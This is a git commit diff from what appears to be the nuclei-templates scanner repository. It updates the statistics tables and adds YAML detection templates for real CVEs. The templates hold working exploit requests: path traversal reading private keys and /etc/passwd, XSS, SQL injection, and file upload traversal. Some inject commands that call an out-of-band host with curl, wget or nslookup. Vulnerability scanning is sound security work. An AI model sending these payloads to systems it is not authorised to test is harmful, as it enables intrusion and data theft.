Merge branch 'master' into token-spray-fix
commit
7e19fd22df
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
|
| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 |
|
||||||
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
|
| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 |
|
||||||
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
|
| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 |
|
||||||
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
|
| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 |
|
||||||
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
|
| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | |
|
||||||
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
|
| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | |
|
||||||
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
|
| rce | 222 | gy741 | 85 | token-spray | 102 | | | | |
|
||||||
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
|
| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | |
|
||||||
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
|
| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | |
|
||||||
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
|
| cve2021 | 169 | madrobot | 65 | file | 57 | | | | |
|
||||||
|
|
||||||
**178 directories, 2459 files**.
|
**182 directories, 2531 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
File diff suppressed because one or more lines are too long
1909
TEMPLATES-STATS.md
1909
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
|
| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 |
|
||||||
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
|
| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 |
|
||||||
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
|
| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 |
|
||||||
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
|
| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 |
|
||||||
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
|
| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | |
|
||||||
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
|
| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | |
|
||||||
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
|
| rce | 222 | gy741 | 85 | token-spray | 102 | | | | |
|
||||||
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
|
| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | |
|
||||||
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
|
| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | |
|
||||||
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
|
| cve2021 | 169 | madrobot | 65 | file | 57 | | | | |
|
||||||
|
|
|
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2016-3088
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
|
||||||
|
author: fq_hsu
|
||||||
|
severity: critical
|
||||||
|
description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/40857
|
||||||
|
- https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
|
||||||
|
- http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-3088
|
||||||
|
tags: fileupload,cve,cve2016,apache,activemq
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2016-3088
|
||||||
|
cwe-id: CWE-20
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
PUT /fileserver/test.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
{{randstr}}
|
||||||
|
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /fileserver/test.txt HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "status_code_1==204"
|
||||||
|
- "status_code_2==200"
|
||||||
|
- "contains((body_2), '{{randstr}}')"
|
||||||
|
condition: and
|
|
@ -39,7 +39,7 @@ requests:
|
||||||
<string>-c</string>
|
<string>-c</string>
|
||||||
</void>
|
</void>
|
||||||
<void index="2">
|
<void index="2">
|
||||||
<string>wget {{interactsh-url}}</string>
|
<string>nslookup {{interactsh-url}}</string>
|
||||||
</void>
|
</void>
|
||||||
</array>
|
</array>
|
||||||
<void method="start"/></void>
|
<void method="start"/></void>
|
||||||
|
@ -49,8 +49,13 @@ requests:
|
||||||
<soapenv:Body/>
|
<soapenv:Body/>
|
||||||
</soapenv:Envelope>
|
</soapenv:Envelope>
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the DNS interaction
|
||||||
words:
|
words:
|
||||||
- "http"
|
- "dns"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2017-10974
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Yaws 1.91 - Remote File Disclosure
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: Yaws 1.91 allows Unauthenticated Remote File Disclosure via HTTP Directory Traversal with /%5C../ to port 8080
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/42303
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-10974
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2017-10974
|
||||||
|
cwe-id: CWE-22
|
||||||
|
tags: cve,cve2017,yaws,lfi
|
||||||
|
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/%5C../ssl/yaws-key.pem"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "BEGIN RSA PRIVATE KEY"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- '!contains(tolower(body), "<html")'
|
||||||
|
- '!contains(tolower(body), "<HTML")'
|
||||||
|
condition: or
|
|
@ -0,0 +1,36 @@
|
||||||
|
id: CVE-2017-15363
|
||||||
|
info:
|
||||||
|
name: Typo3 Restler Extension - Local File Disclosure
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/42985
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2017-15363
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2017-15363
|
||||||
|
cwe-id: CWE-98
|
||||||
|
tags: cve,cve2017,restler,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<?php"
|
||||||
|
- "'host'"
|
||||||
|
- "'database'"
|
||||||
|
- "'extConf'"
|
||||||
|
- "'debug'"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2017-5982
|
||||||
|
info:
|
||||||
|
name: Kodi 17.1 Local File Inclusion
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: Insufficient validation of user input is performed on this URL resulting in a local file inclusion vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://cxsecurity.com/issue/WLB-2017020164
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2017-5982
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.5
|
||||||
|
cve-id: CVE-2017-5982
|
||||||
|
cwe-id: CWE-98
|
||||||
|
tags: cve,cve2017,kodi,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -25,7 +25,7 @@ requests:
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "admin:.*:"
|
- "admin:.*:*sh$"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
@ -1,11 +1,10 @@
|
||||||
id: CVE-2018-2791
|
id: CVE-2018-2791
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Oracle WebCenter Sites XSS
|
name: Oracle WebCenter Sites Multiple XSS
|
||||||
author: madrobot
|
author: madrobot,leovalcante
|
||||||
severity: high
|
severity: high
|
||||||
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware.
|
||||||
tags: cve,cve2018,oracle,xss
|
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
|
||||||
cvss-score: 8.20
|
cvss-score: 8.20
|
||||||
|
@ -15,20 +14,30 @@ info:
|
||||||
- http://www.securitytracker.com/id/1040695
|
- http://www.securitytracker.com/id/1040695
|
||||||
- http://www.securityfocus.com/bid/103800
|
- http://www.securityfocus.com/bid/103800
|
||||||
- https://www.exploit-db.com/exploits/44752/
|
- https://www.exploit-db.com/exploits/44752/
|
||||||
|
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||||
|
tags: cve,cve2018,oracle,xss,wcs
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- raw:
|
||||||
path:
|
- |
|
||||||
- "{{BaseURL}}/servlet/Satellite?destpage=%22%3Ch1xxx%3Cscriptalert(1)%3C%2Fscript&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError"
|
GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
||||||
|
Host: {{BaseURL}}
|
||||||
|
|
||||||
matchers-condition: and
|
- |
|
||||||
|
GET /cs/Satellite?destpage="<h1xxx"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1
|
||||||
|
Host: {{BaseURL}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
|
||||||
- "<h1xxx<scriptalert(1)</script"
|
|
||||||
part: body
|
part: body
|
||||||
|
words:
|
||||||
|
- '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
|
part: body
|
||||||
words:
|
words:
|
||||||
- "text/html"
|
- '<script>alert(24)</script>'
|
||||||
part: header
|
- 'Missing translation key'
|
||||||
|
condition: and
|
|
@ -0,0 +1,45 @@
|
||||||
|
id: CVE-2018-3238
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Multiple XSS Oracle WebCenter Sites
|
||||||
|
author: leovalcante
|
||||||
|
severity: medium
|
||||||
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 11.1.1.8.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites.
|
||||||
|
reference:
|
||||||
|
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-3238
|
||||||
|
tags: cve,cve2018,oracle,wcs,xss
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
|
||||||
|
cvss-score: 6.90
|
||||||
|
cve-id: CVE-2018-3238
|
||||||
|
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq"><script>alert(document.domain)</script> HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<script>alert(document.domain)</script>'
|
||||||
|
- 'Variables.cs_imagedir'
|
||||||
|
condition: and
|
|
@ -0,0 +1,57 @@
|
||||||
|
id: CVE-2019-1821
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Cisco Prime Infrastructure Unauthorized RCE (CVE-2019-1821)
|
||||||
|
author: _0xf4n9x_
|
||||||
|
severity: critical
|
||||||
|
description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-1821
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'http.title:"prime infrastructure"'
|
||||||
|
tags: rce,fileupload,unauth,cve,cve2019
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2019-1821
|
||||||
|
cwe-id: CWE-20
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /servlet/UploadServlet HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Connection: close
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
Primary-IP: 127.0.0.1
|
||||||
|
Filename: test.tar
|
||||||
|
Filesize: 10240
|
||||||
|
Compressed-Archive: false
|
||||||
|
Destination-Dir: tftpRoot
|
||||||
|
Filecount: 1
|
||||||
|
Content-Length: 269
|
||||||
|
Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83
|
||||||
|
|
||||||
|
--871a4a346a547cf05cb83f57b9ebcb83
|
||||||
|
Content-Disposition: form-data; name="files"; filename="test.tar"
|
||||||
|
|
||||||
|
../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}}
|
||||||
|
--871a4a346a547cf05cb83f57b9ebcb83--
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /test.txt HTTP/1.1
|
||||||
|
Host: {{Host}}
|
||||||
|
Connection: close
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "status_code==200"
|
||||||
|
- "contains((body_2), '{{randstr}}')"
|
||||||
|
condition: and
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: CVE-2019-2578
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Broken Access Control Oracle WebCenter Sites
|
||||||
|
author: leovalcante
|
||||||
|
severity: high
|
||||||
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
|
||||||
|
reference: https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||||
|
tags: cve,cve2019,oracle,wcs,auth-bypass
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||||
|
cvss-score: 8.60
|
||||||
|
cve-id: CVE-2019-2578
|
||||||
|
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '<script[\d\D]*<throwexception/>'
|
|
@ -0,0 +1,51 @@
|
||||||
|
id: CVE-2019-2579
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Oracle WebCenter Sites - SQL Injection
|
||||||
|
author: leovalcante
|
||||||
|
severity: medium
|
||||||
|
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
|
||||||
|
reference:
|
||||||
|
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
||||||
|
- https://github.com/Leovalcante/wcs_scanner
|
||||||
|
tags: cve,cve2019,oracle,wcs,sqli
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 4.30
|
||||||
|
cve-id: CVE-2019-2579
|
||||||
|
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /cs/ContentServer HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: authkey
|
||||||
|
part: body
|
||||||
|
internal: true
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "value='' and '1'='0 --"
|
||||||
|
- "Use this utility to view and manage URLs"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,33 @@
|
||||||
|
id: CVE-2019-3929
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929)
|
||||||
|
author: _0xf4n9x_
|
||||||
|
severity: critical
|
||||||
|
description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
|
||||||
|
reference:
|
||||||
|
- http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
|
||||||
|
- https://www.exploit-db.com/exploits/46786/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-3929
|
||||||
|
tags: rce,cve,cve2019,oast
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2019-3929
|
||||||
|
cwe-id: CWE-78
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/cgi-bin/file_transfer.cgi"
|
||||||
|
|
||||||
|
body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
words:
|
||||||
|
- "http"
|
|
@ -0,0 +1,50 @@
|
||||||
|
id: CVE-2020-26413
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gitlab User enumeration via Graphql API
|
||||||
|
author: _0xf4n9x_,pikpikcu
|
||||||
|
severity: medium
|
||||||
|
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible.
|
||||||
|
reference:
|
||||||
|
- https://gitlab.com/gitlab-org/gitlab/-/issues/244275
|
||||||
|
- https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-26413
|
||||||
|
tags: cve,cve2020,gitlab,exposure,enum
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.30
|
||||||
|
cve-id: CVE-2020-26413
|
||||||
|
cwe-id: CWE-200
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /api/graphql HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{
|
||||||
|
"query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }",
|
||||||
|
"variables": null,
|
||||||
|
"operationName": null
|
||||||
|
}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"username":'
|
||||||
|
- '"avatarUrl":'
|
||||||
|
- '"node":'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: json
|
||||||
|
part: body
|
||||||
|
json:
|
||||||
|
- '.data.users.edges[].node.email'
|
|
@ -60,4 +60,4 @@ requests:
|
||||||
part: interactsh_request
|
part: interactsh_request
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- '([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com'
|
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
|
||||||
|
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: CVE-2021-31602
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Pentaho <= 9.1 Authentication Bypass of Spring APIs
|
||||||
|
author: pussycat0x
|
||||||
|
severity: medium
|
||||||
|
reference:
|
||||||
|
- https://seclists.org/fulldisclosure/2021/Nov/13
|
||||||
|
- https://portswigger.net/daily-swig/remote-code-execution-sql-injection-bugs-uncovered-in-pentaho-business-analytics-software
|
||||||
|
- https://hawsec.com/publications/pentaho/HVPENT210401-Pentaho-BA-Security-Assessment-Report-v1_1.pdf
|
||||||
|
metadata:
|
||||||
|
shodan-query: 'Pentaho'
|
||||||
|
tags: cve,cve2021,pentaho,auth-bypass
|
||||||
|
|
||||||
|
description: "An issue was discovered in Hitachi Vantara Pentaho through 9.1 and Pentaho Business Intelligence Server through 7.x. The Security Model has different layers of Access Control. One of these layers is the applicationContext security, which is defined in the applicationContext-spring-security.xml file. The default configuration allows an unauthenticated user with no previous knowledge of the platform settings to extract pieces of information without possessing valid credentials.\n\n"
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js"
|
||||||
|
- "{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<roleList>'
|
||||||
|
